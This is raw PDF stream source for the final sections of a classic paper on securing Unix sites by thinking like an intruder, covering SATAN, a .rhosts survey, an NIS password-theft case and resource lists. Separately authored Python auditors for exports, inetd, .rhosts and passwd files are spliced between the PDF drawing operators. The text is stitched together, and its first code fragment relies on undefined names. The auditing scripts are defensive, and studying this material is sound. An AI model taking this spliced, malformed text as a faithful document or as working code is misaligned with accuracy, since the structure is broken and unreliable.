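SAMPLE_INETD = """\
# inetd.conf -- constructed example
ftp     stream  tcp  nowait  root    /usr/sbin/tcpd        in.ftpd -l
telnet  stream  tcp  nowait  root    /usr/sbin/in.telnetd  in.telnetd
#shell  stream  tcp  nowait  root    /usr/sbin/tcpd        in.rshd
login   stream  tcp  nowait  root    /usr/sbin/in.rlogind  in.rlogind
finger  stream  tcp  nowait  nobody  /usr/sbin/tcpd        in.fingerd
tftp    dgram   udp  wait    root    /usr/sbin/in.tftpd    in.tftpd
daytime stream  tcp  nowait  root    internal
"""

# One client specification: "client(options)", "client" or "(options)".
CLIENT_SPEC = re.compile(r'([^(]*)(?:\((.*)\))?')


def parse_exports(text):
    """Return (path, client, options) triples; client '*' means every host."""
    entries = []
    for line in text.splitlines():
        line = line.split('#', 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        path, specs = fields[0], fields[1:]
        if not specs:
            # A path with no client list at all is exported to everyone.
            entries.append((path, '*', set()))
        for spec in specs:
            m = CLIENT_SPEC.fullmatch(spec)
            if m is None:
                continue  # unparsable token; exportfs would reject it too
            client, opts = m.groups()
            # "path (ro)" with a space before the parenthesis is the classic
            # slip: the options become a client spec of their own, i.e. the world.
            options = set(opts.split(',')) if opts else set()
            entries.append((path, client or '*', options))
    return entries


def audit_exports(text):
    """Flag exports that are world-visible, writable, or keep remote root as root."""
    findings = []
    for path, client, options in parse_exports(text):
        problems = []
        if client == '*':
            problems.append('exported to the world')
        if 'rw' in options:
            problems.append('read-write')
        if 'no_root_squash' in options:
            problems.append('remote root is not squashed')
        if problems:
            findings.append((path, client, problems))
    return findings


def audit_inetd(text, needed, wrapper='/usr/sbin/tcpd'):
    """List enabled inetd services; flag any not in `needed` and any not run
    through the tcpd wrapper ('internal' builtins cannot be wrapped)."""
    findings = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith('#'):
            continue  # a commented-out line is a disabled service
        fields = line.split()
        if len(fields) < 6:
            continue
        service, server = fields[0], fields[5]
        problems = []
        if service not in needed:
            problems.append('not explicitly needed: remove it')
        if server not in (wrapper, 'internal'):
            problems.append('not run via tcpd: connection sources are not logged')
        findings.append((service, server, problems))
    return findings


if __name__ == '__main__':
    for path, client, problems in audit_exports(SAMPLE_EXPORTS):
        print(f'{path} -> {client}: {", ".join(problems)}')
    for service, server, problems in audit_inetd(SAMPLE_INETD, needed={'ftp', 'daytime'}):
        print(f'{service} ({server}): {", ".join(problems) or "ok"}')
```

Run it against the real files with `audit_exports(open('/etc/exports').read())` and `audit_inetd(open('/etc/inetd.conf').read(), needed=...)`; the `needed` set is the administrator's own list, so the script reports rather than decides what to remove.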
/T1_2 1 Tf
19.38461 0 0 19.38461 10 543.01489 Tm
(Conclusions)Tj
/T1_0 1 Tf
14 0 0 14 10 505.71402 Tm
(Perhaps none of the methods shown here are surprising; when writing this\
paper, we didn't learn very )Tj
T*
(much about how to break into systems. What we _did_ learn was, while tes\
ting these methods out on our )Tj
T*
(own systems and that of friendly sites, just how effective this set of m\
ethods is for gaining access to a )Tj
T*
(typical \(UNIX\) Internet host. Tiring of trying to type these in all by\
hand, and desiring to keep our own )Tj
T*
(systems more secure, we decided to implement a security tool \(SATAN\) t\
hat attempts to check remote )Tj
T*
(hosts for at least some of the problems discussed here. The typical resp\
onse, when telling people about )Tj
T*
(our paper and our tool was something on the order of "that sounds pretty\
 dangerous -- I hope you're not )Tj
T*
(going to give it out to everybody. But since you can trust me, may I hav\
e a copy of it?" )Tj
0 -2.55714 TD
(We never set out to create a cookbook or toolkit of methods and programs\
on how to break into systems )Tj
0 -1.2 TD
(-- instead, we saw that these same methods were being used, every day, a\
gainst ourselves and against )Tj
T*
(friendly system administrators. We believe that by propagating informati\
on that normally wasn't )Tj
T*
(available to those outside of the underworld, we can increase security b\
y raising awareness. Trying to )Tj
T*
(restrict access to "dangerous" security information has never seemed to \
be a very effective method for )Tj
T*
(increasing security; indeed, the opposite appears to be the case, since \
the system crackers have shown )Tj
T*
(little reticence to share their information with each other. )Tj
0 -2.55714 TD
(While it is almost certain that some of the information presented here i\
s new material to \(aspiring\) )Tj
0 -1.2 TD
(system crackers, and that some will use it to gain unauthorized entrance\
onto hosts, the evidence )Tj
T*
(presented even by our ad hoc tests shows that there is a much larger num\
ber of insecure sites, simply )Tj
T*
(because the system administrators don't know any better -- they aren't s\
tupid or slow, they simply are )Tj
T*
(unable to spend the very little free time that they have to explore all \
of the security issues that pertain to )Tj
T*
(their systems. Combine that with no easy access to this sort of informat\
ion and you have poorly )Tj
T*
(defended systems. We \(modestly\) hope that this paper will provide badl\
y-needed data on how systems )Tj
T*
(are broken into, and further, to explain _why_ certain steps should be t\
aken to secure a system. Knowing )Tj
T*
(why something is a problem is, in our opinion, the real key to learning \
and to making an informed, )Tj
T*
(intelligent choice as to what security really means for your site. )Tj
ET
EMC
/Artifact <>BDC
Q
EMC
endstream
endobj
161 0 obj 4150
endobj
162 0 obj<>stream
/Artifact <>BDC
0 0 0 rg
0 i
EMC
/Article <>BDC
q
0 18 612 756 re
W* n
0.5 0.5 0.5 rg
10 761.73846 m
10 763.73846 l
602 763.73846 l
601 762.73846 l
11 762.73846 l
11 762.73846 l
h
f
0.875 0.875 0.875 rg
602 763.73846 m
602 761.73846 l
10 761.73846 l
11 762.73846 l
601 762.73846 l
601 762.73846 l
h
f
0 0 0 rg
BT
/T1_1 1 Tf
24.76923 0 0 24.76923 10 714.03522 Tm
(Appendix A:)Tj
19.38461 0 0 19.38461 10 670.03027 Tm
(SATAN \(Security Analysis Tool for Auditing Networks\))Tj
/T1_0 1 Tf
14 0 0 14 10 632.72937 Tm
(Originally conceived some years ago, SATAN is actually the prototype of \
a much larger and more )Tj
0 -1.2 TD
(comprehensive vision of a security tool. In its current incarnation, SAT\
AN remotely probes and reports )Tj
T*
(various bugs and weaknesses in network services and windowing systems, a\
s well as detailing as much )Tj
T*
(generally useful information as possible about the target\(s\). It then \
processes the data with a crude filter )Tj
T*
(and what might be termed an expert system to generate the final security\
analysis. While not particularly )Tj
T*
(fast, it is extremely modular and easy to modify. )Tj
0 -2.55714 TD
(SATAN consists of several sub-programs, each of which is an executable f\
ile \(perl, shell, compiled C )Tj
0 -1.2 TD
(binary, whatever\) that tests a host for a given potential weakness. Add\
ing further test programs is as )Tj
T*
(simple as putting an executable into the main directory with the extensi\
on ".sat"; the driver program will )Tj
T*
(automatically execute it. The driver generates a set of targets \(using \
DNS and a fast version of ping )Tj
T*
(together to get "live" targets\), and then executes each of the programs\
over each of the targets. A data )Tj
T*
(filtering/interpreting program then analyzes the output, and lastly a re\
porting program digests everything )Tj
T*
(into a more readable format. )Tj
0 -2.55714 TD
(The entire package, including source code and documentation, will be mad\
e freely available to the )Tj
0 -1.2 TD
(public, via anonymous ftp and by posting it to one of the numerous sourc\
e code groups on the Usenet. )Tj
ET
0.5 0.5 0.5 rg
10 326.75385 m
10 328.75385 l
602 328.75385 l
601 327.75385 l
11 327.75385 l
11 327.75385 l
h
f
0.875 0.875 0.875 rg
602 328.75385 m
602 326.75385 l
10 326.75385 l
11 327.75385 l
601 327.75385 l
601 327.75385 l
h
f
0 0 0 rg
BT
/T1_1 1 Tf
24.76923 0 0 24.76923 10 279.05063 Tm
(Appendix B:)Tj
/T1_0 1 Tf
14 0 0 14 10 240.00632 Tm
(An informal survey conducted on about a dozen Internet sites \(education\
al, military, and commercial, )Tj
T*
(with over 200 hosts and 40000 accounts\) revealed that on the average, c\
lose to 10 percent of a site's )Tj
T*
(accounts had .rhosts files. These files averaged six trusted hosts each;\
however, it was not uncommon to )Tj
T*
(have well over one hundred entries in an account's .rhosts file, and on \
a few occasions, the number was )Tj
T*
(over five hundred! \(This is not a record one should be proud of owning.\
\) In addition, _every_ site )Tj
T*
(directly on the Internet \(one site was mostly behind a firewall\) trust\
ed a user or host at another site -- )Tj
T*
(thus, the security of the site was not under the system administrator's \
direct control. The larger sites, with )Tj
T*
(more users and hosts, had a lower percentage of users with .rhosts files\
, but the size of .rhosts files )Tj
T*
(increased, as well as the number of trusted off-site hosts. )Tj
0 -2.55714 TD
(Although it was very difficult to verify how many of the entries were va\
lid, with such hostnames such as )Tj
0 -1.2 TD
("Makefile", "Message-Id:", and "^Cs^A^C^M^Ci^C^MpNu^L^Z^O", as well as q\
uite a few wildcard )Tj
ET
EMC
/Artifact <>BDC
Q
EMC
endstream
endobj
163 0 obj 4160
endobj
164 0 obj<>stream
/Artifact <>BDC
0 0 0 rg
0 i
EMC
/Article <>BDC
q
0 18 612 756 re
W* n
BT
/T1_0 1 Tf
14 0 0 14 10 753.97552 Tm
(entries, we question the wisdom of putting a site's security in the hand\
s of its users. Many users )Tj
0 -1.2 TD
(\(especially the ones with larger .rhosts files\) attempted to put shell\
-style comments in their .rhosts files, )Tj
T*
(which most UNIX systems attempt to resolve as valid host names. Unfortun\
ately, an attacker can then )Tj
T*
(use the DNS and NIS hostname spoofing techniques discussed earlier to se\
t their hostname to "#" and )Tj
T*
(freely log in. This puts a great many sites at risk \(at least one major\
vendor ships their systems with )Tj
T*
(comments in their /etc/hosts.equiv files.\) )Tj
0 -2.55714 TD
(You might think that these sites were not typical, and, as a matter of f\
act, they weren't. Virtually all of )Tj
0 -1.2 TD
(the administrators knew a great deal about security and wrote security p\
rograms for a hobby or )Tj
T*
(profession, and many of the sites that they worked for did either securi\
ty research or created security )Tj
T*
(products. We can only guess at what a "typical" site might look like. )Tj
ET
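The .rhosts problems described in this appendix (wildcards, off-site trust, entries that are not host names at all, and shell-style comments that rlogind compares like any other host) are easy to find once the file is read the way rlogind reads it, without discarding "comment" lines. The following auditor is an added example, not the survey tool the authors used: it reports every entry that is a wildcard, fails RFC 1123 host-name syntax, trusts a host outside the local domain, or names a host that is not in the site's host table. The sample .rhosts, the local domain example.com and the KNOWN_HOSTS table are constructed for the example.

```python
import re

# RFC 1123 host-name syntax: labels of letters, digits and hyphens joined by dots.
_LABEL = r'[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?'
HOSTNAME = re.compile(rf'{_LABEL}(?:\.{_LABEL})*')

# Constructed ~/.rhosts showing the mistakes the survey found; not a real account.
# The first line is the "shell-style comment" problem: rlogind reads it as a host.
SAMPLE_RHOSTS = """\
# trusted gateways
gw.example.com
gw.example.com alice
+ +
Makefile
Message-Id:
\x03s\x01\x03i\x03
mail.other-site.org bob
-badhost.example.com
"""

# Assumed site host table that entries are verified against.
KNOWN_HOSTS = {'gw.example.com', 'badhost.example.com', 'web1.example.com'}


def audit_rhosts(text, local_domain, known_hosts):
    """Return (line number, line, problems) for every suspicious .rhosts entry.

    Lines are never skipped as comments: rlogind does not skip them either."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        fields = line.split()
        if not fields:
            continue
        host = fields[0]
        user = fields[1] if len(fields) > 1 else None
        problems = []
        if host == '+':
            problems.append('wildcard host: every host that can reach rlogind is trusted')
        if user == '+':
            problems.append('wildcard user: every user on that host is trusted')
        if host == '+' or host.lstrip('+-').startswith('@'):
            pass  # wildcard already reported; netgroups need the NIS map to check
        else:
            name = host[1:] if host.startswith('-') else host  # "-host" is a denial
            if not HOSTNAME.fullmatch(name):
                problems.append('not a host name (comment or garbage): rlogind still '
                                'compares it, so a spoofed DNS/NIS name matching it logs in')
            elif '.' in name and not name.endswith('.' + local_domain):
                problems.append('trusts an off-site host: its security is not under your control')
            elif name not in known_hosts and f'{name}.{local_domain}' not in known_hosts:
                problems.append('unknown host name: cannot be verified, likely stale or bogus')
        if problems:
            findings.append((lineno, line, problems))
    return findings


if __name__ == '__main__':
    for lineno, line, problems in audit_rhosts(SAMPLE_RHOSTS, 'example.com', KNOWN_HOSTS):
        print(f'line {lineno}: {line!r}')
        for p in problems:
            print(f'    {p}')
```

The same function applies unchanged to /etc/hosts.equiv, which shares the format and, as the appendix notes, ships with comment lines on at least one vendor's systems.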
0.5 0.5 0.5 rg
10 551 m
10 553 l
602 553 l
601 552 l
11 552 l
11 552 l
h
f
0.875 0.875 0.875 rg
602 553 m
602 551 l
10 551 l
11 552 l
601 552 l
601 552 l
h
f
0 0 0 rg
BT
/T1_1 1 Tf
24.76923 0 0 24.76923 10 503.29678 Tm
(Appendix C:)Tj
/T1_0 1 Tf
14 0 0 14 10 464.25247 Tm
(After receiving mail from a site that had been broken into from one of o\
ur systems, an investigation was )Tj
T*
(started. In time, we found that the intruder was working from a list of \
".com" \(commercial\) sites, looking )Tj
T*
(for hosts with easy-to-steal password files. In this case, "easy-to-stea\
l" referred to sites with a guessable )Tj
T*
(NIS domainname and an accessible NIS server. Not knowing how far the int\
ruder had gotten, it looked )Tj
T*
(like a good idea to warn the sites that were in fact vulnerable to passw\
ord file theft. Of the 656 hosts in )Tj
T*
(the intruder's hit list, 24 had easy-to-steal password files -- about on\
e in twenty-five hosts! One third of )Tj
T*
(these files contained at least one password-less account with an interac\
tive shell. With a grand total of )Tj
T*
(1594 password-file entries, a ten-minute run of a publicly-available pas\
sword cracker \(Crack\) revealed )Tj
T*
(more than 50 passwords, using nothing but a low-end Sun workstation. Ano\
ther 40 passwords were )Tj
T*
(found within the next 20 minutes; and a root password was found in just \
over an hour. The result after a )Tj
T*
(few days of cracking: five root passwords found, 19 out of 24 password f\
iles \(eighty percent\) with at )Tj
T*
(least one known password, and 259 of 1594 \(one in six\) passwords guess\
ed. )Tj
ET
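Before a stolen password file ever reaches Crack, two of the conditions this appendix describes can be found by inspection: accounts with an empty password field and an interactive shell, and hashes that are exposed because the file is not shadowed (which is also the "use shadow passwords" recommendation earlier in the paper). The audit below is an added example, not the authors' procedure; the sample file stands in for what `ypcat passwd` returns from a site with a guessable NIS domain name, and the 13-character hash in it is a made-up crypt(3)-style string, not a real account's.

```python
# Constructed passwd-format file (not from any real site); the hash is invented.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/sh
toor:x:0:0:alternate root:/root:/bin/csh
daemon:*:1:1::/:/bin/false
ftp::14:50:Anonymous FTP:/home/ftp:/bin/false
guest::1001:100:Guest account:/home/guest:/bin/sh
alice:RfzPiZcCbMD9E:1002:100:Alice:/home/alice:/bin/csh
bob:x:1003:100:Bob:/home/bob:/bin/ksh
"""

# Shells that give a login session; assumed list, extend for your systems.
INTERACTIVE_SHELLS = {'/bin/sh', '/bin/csh', '/bin/ksh', '/bin/bash', '/bin/tcsh'}


def audit_passwd(text):
    """Return ([(user, problems)], [uid-0 users]) for a passwd-format file."""
    findings, superusers = [], []
    for line in text.splitlines():
        fields = line.split(':')
        if len(fields) != 7:
            continue  # not a passwd entry
        user, pw, uid, _gid, _gecos, _home, shell = fields
        problems = []
        if pw == '':
            if shell in INTERACTIVE_SHELLS:
                problems.append('no password and an interactive shell: anyone can log in')
            else:
                problems.append('no password')
        elif pw not in ('x', '*') and not pw.startswith('!'):
            # A real hash in a readable or NIS-served passwd file is what Crack eats.
            problems.append('hash is exposed in passwd: use shadow passwords')
        if uid == '0':
            superusers.append(user)
        if problems:
            findings.append((user, problems))
    return findings, superusers


if __name__ == '__main__':
    findings, superusers = audit_passwd(SAMPLE_PASSWD)
    print('uid 0 accounts:', ', '.join(superusers))
    for user, problems in findings:
        print(f'{user}: {"; ".join(problems)}')
```

Every extra uid-0 account is a second root password for the cracker to find, which is why the script lists them alongside the password problems.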
0.5 0.5 0.5 rg
10 246.67693 m
10 248.67693 l
602 248.67693 l
601 247.67693 l
11 247.67693 l
11 247.67693 l
h
f
0.875 0.875 0.875 rg
602 248.67693 m
602 246.67693 l
10 246.67693 l
11 247.67693 l
601 247.67693 l
601 247.67693 l
h
f
0 0 0 rg
BT
/T1_1 1 Tf
24.76923 0 0 24.76923 10 198.97371 Tm
(Appendix D:)Tj
19.38461 0 0 19.38461 10 154.96872 Tm
(How to get some free security resources on the Internet)Tj
16.15384 0 0 16.15384 10 115.53804 Tm
(Mailing lists:)Tj
/T1_2 1 Tf
7 0 0 7 35.713 79.28325 Tm
(l)Tj
/T1_0 1 Tf
( )Tj
14 0 0 14 50 79.28325 Tm
(The CERT \(Computer Emergency Response Team\) advisory mailing list. Sen\
d e-mail to )Tj
T*
(cert@cert.org, and ask to be placed on their mailing list. )Tj
/T1_2 1 Tf
7 0 0 7 35.713 45.68324 Tm
(l)Tj
/T1_0 1 Tf
( )Tj
14 0 0 14 50 45.68324 Tm
(The Phrack newsletter. Send an e-mail message to phrack@well.sf.ca.us an\
d ask to be added to )Tj
ET
EMC
/Artifact <>BDC
Q
EMC
endstream
endobj
165 0 obj 3932
endobj
166 0 obj<>stream
/Artifact <>BDC
0 0 0 rg
0 i
EMC
/Article <>BDC
q
0 18 612 756 re
W* n
BT
/T1_0 1 Tf
14 0 0 14 50 753.97552 Tm
(the list. )Tj
/T1_1 1 Tf
7 0 0 7 35.713 737.17554 Tm
(l)Tj
/T1_0 1 Tf
( )Tj
14 0 0 14 50 737.17554 Tm
(The Firewalls mailing list. Send the following line to majordomo@greatci\
rcle.com: )Tj
/T1_2 1 Tf
0 -2.56197 TD
( subscribe firewalls)Tj
/T1_1 1 Tf
7 0 0 7 35.713 665.57556 Tm
(l)Tj
/T1_0 1 Tf
( )Tj
14 0 0 14 50 665.57556 Tm
(Computer Underground Digest. Send e-mail to tk0jut2@mvs.cso.niu.edu, ask\
ing to be placed on )Tj
0 -1.2 TD
(the list. )Tj
/T1_3 1 Tf
16.15384 0 0 16.15384 10 610.8457 Tm
(Free Software:)Tj
/T1_0 1 Tf
14 0 0 14 10 574.59094 Tm
(COPS \(Computer Oracle and Password System\) is available via anonymous \
ftp from )Tj
ET
0 0 1 RG
0.7056 w 10 M 0 j 0 J []0 d
489.06598 572.47412 m
595.242 572.47412 l
S
0 0 1 rg
BT
/T1_0 1 Tf
14 0 0 14 489.06598 574.59094 Tm
(ftp://ftp.win.tue.nl/)Tj
ET
10 553.67413 m
83.108 553.67413 l
S
BT
/T1_0 1 Tf
14 0 0 14 10 555.79095 Tm
(pub/security/)Tj
0 0 0 rg
(. )Tj
0 -2.7 TD
(The latest version of Berkeley sendmail is available via anonymous ftp f\
rom )Tj
ET
439.26801 515.87415 m
600.63202 515.87415 l
S
0 0 1 rg
BT
/T1_0 1 Tf
14 0 0 14 439.26801 517.99091 Tm
(ftp://ftp.cs.berkeley.edu/ucb/)Tj
ET
10 497.07413 m
64.44601 497.07413 l
S
BT
/T1_0 1 Tf
14 0 0 14 10 499.19092 Tm
(sendmail/)Tj
0 0 0 rg
(. )Tj
T*
(Sources for ftpd and many other network utilities can be found in )Tj
ET
379.38998 459.27414 m
589.362 459.27414 l
S
0 0 1 rg
BT
/T1_0 1 Tf
14 0 0 14 379.38998 461.39093 Tm
(ftp://ftp.uu.net/packages/bsd-sources/)Tj
0 0 0 rg
(. )Tj
-26.38499 -2.7 Td
(Source for ISS \(Internet Security Scanner\), a tool that remotely scans\
for various network )Tj
0 -1.2 TD
(vulnerabilities, is available via anonymous ftp from )Tj
ET
302.418 404.67413 m
597.18805 404.67413 l
S
0 0 1 rg
BT
/T1_0 1 Tf
14 0 0 14 302.418 406.79092 Tm
(ftp://ftp.uu.net/usenet/comp.sources.misc/volume40/)Tj
ET
10 385.87415 m
28.67599 385.87415 l
S
BT
/T1_0 1 Tf
14 0 0 14 10 387.99094 Tm
(iss/)Tj
0 0 0 rg
(. )Tj
0 -2.7 TD
(Securelib is available via anonymous ftp from )Tj
ET
271.68802 348.07413 m
566.45795 348.07413 l
S
0 0 1 rg
BT
/T1_0 1 Tf
14 0 0 14 271.68802 350.19092 Tm
(ftp://ftp.uu.net/usenet/comp.sources.misc/volume36/)Tj
ET
10 329.27414 m
64.43201 329.27414 l
S
BT
/T1_0 1 Tf
14 0 0 14 10 331.39093 Tm
(securelib/)Tj
0 0 0 rg
(. )Tj
ET
0.5 0.5 0.5 rg
10 296.61539 m
10 298.61539 l
602 298.61539 l
601 297.61539 l
11 297.61539 l
11 297.61539 l
h
f
0.875 0.875 0.875 rg
602 298.61539 m
602 296.61539 l
10 296.61539 l
11 297.61539 l
601 297.61539 l
601 297.61539 l
h
f
0 0 0 rg
BT
/T1_3 1 Tf
19.38461 0 0 19.38461 10 253.63025 Tm
(Bibliography:)Tj
/T1_4 1 Tf
14 0 0 14 10 216.32941 Tm
(Baldwin, Robert W.)Tj
/T1_0 1 Tf
(, )Tj
/T1_5 1 Tf
(Rule Based Analysis of Computer Security)Tj
/T1_0 1 Tf
(, Massachusetts Institute of )Tj
0 -1.2 TD
(Technology, June 1987. )Tj
/T1_4 1 Tf
0 -2.55714 TD
(Bellovin, Steve)Tj
/T1_0 1 Tf
(, )Tj
/T1_5 1 Tf
(Using the Domain Name System for System Break-ins)Tj
/T1_0 1 Tf
(, 1992 \(unpublished\). )Tj
/T1_4 1 Tf
T*
(Massachusetts Institute of Technology)Tj
/T1_0 1 Tf
(, )Tj
/T1_5 1 Tf
(X Window System Protocol)Tj
/T1_0 1 Tf
(, Version 11, 1990. )Tj
/T1_4 1 Tf
T*
(Shimomura, Tsutomu)Tj
/T1_0 1 Tf
(, private communication. )Tj
/T1_4 1 Tf
T*
(Sun Microsystems)Tj
/T1_0 1 Tf
(, )Tj
/T1_5 1 Tf
(OpenWindows V3.0.1 User Commands)Tj
/T1_0 1 Tf
(, March 1992. )Tj
ET
EMC
/Artifact <>BDC
Q
EMC
endstream
endobj
167 0 obj(Improving the Security of Your Site by Breaking Into it)
endobj
168 0 obj<>
endobj
169 0 obj<>
endobj
170 0 obj<>
endobj
171 0 obj<>
endobj
172 0 obj[169 0 R]
endobj
173 0 obj(http://www.deter.com/unix/papers/improve_by_breakin.html)
endobj
174 0 obj(ˆ†‹îšnQ×QèhFêÒ4)
endobj
175 0 obj<>
endobj
176 0 obj<>
endobj
177 0 obj(;’?Ý‚+Ý[qòìžÁw…)
endobj
178 0 obj<>
endobj
179 0 obj<>
endobj
180 0 obj<>
endobj
181 0 obj<>
endobj
182 0 obj<>
endobj
183 0 obj<>stream
Improving the Security of Your Site by Breaking Into it
endstream
endobj
%%EOF